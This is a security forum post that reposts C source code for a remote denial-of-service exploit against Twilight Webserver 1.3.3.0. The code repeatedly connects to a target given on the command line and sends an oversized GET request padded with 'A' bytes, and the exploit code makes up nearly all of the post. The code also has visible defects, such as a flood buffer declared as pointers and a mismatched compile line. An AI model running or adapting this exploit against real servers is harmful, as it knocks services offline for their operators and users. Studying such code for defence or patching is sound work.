Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-1-17 16:06 只看该作者

Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit

复制内容到剪贴板

代码:

/****************************************************************************

*    Denial of Service Attack against Twilight Webserver v1.3.3.0

*     Author: H0tTurk-

*    

*    WebSite: [url]http://www.twilightutilities.com[/url]

*     Version: Twilight Webserver v1.3.3.0 $24.95 USD

*     NewVersion: Tw 2.1

*    

*     Exploit: tw.c

*     Compile: gcc twilight -o tw

*     Contact:

*     [-] Mail: [email]hotturk@mynet.com[/email]

*     [-] Web: [url]http://www.ayyildiz.org[/url]



*     [-] MSN: [email]h0tturk@h0tturk.com[/email]

*****************************************************************************/



#include <stdio.h>

#include <netdb.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>



int main(int argc, char *argv[])

{

      int sockfd;

      struct sockaddr_in srv;

      struct hostent *host;

      char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";



      memset(flood, 0x41, 1037);

     

      strncpy(send, get, sizeof(send) -1);

      strncat(send, flood, sizeof(send) - strlen(send) -1);

      strncat(send, http, sizeof(send) - strlen(send) -1);

     

      if(argc < 3)

      {

           printf("Usage: %s [target] <port>\n", argv[0]);

           exit(0);

      }



      if((host = gethostbyname(argv[1])) == NULL)

      {    

           printf("Unknown host!\n");

           exit(0);

      }

     

      srv.sin_family = AF_INET;

      srv.sin_port = htons(atoi(argv[2]));

      srv.sin_addr.s_addr = inet_addr((char*)argv[1]);



      printf("h0t against Twilight Webserver v1.3.3.0\n");



      for(;;)

      {

           if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)

           {

                printf("Can&#39;t start socket()!\n"); exit(0);

           }

     

           if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)

           {

                printf("Connection to server broken!\n"); close(sockfd);

           }

     

           if(write(sockfd, send, strlen(send)) < 0)

           {

                break;

           }

     

           close(sockfd);

      }

     

      printf("Attack done!...\n");

     

      return 0;

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit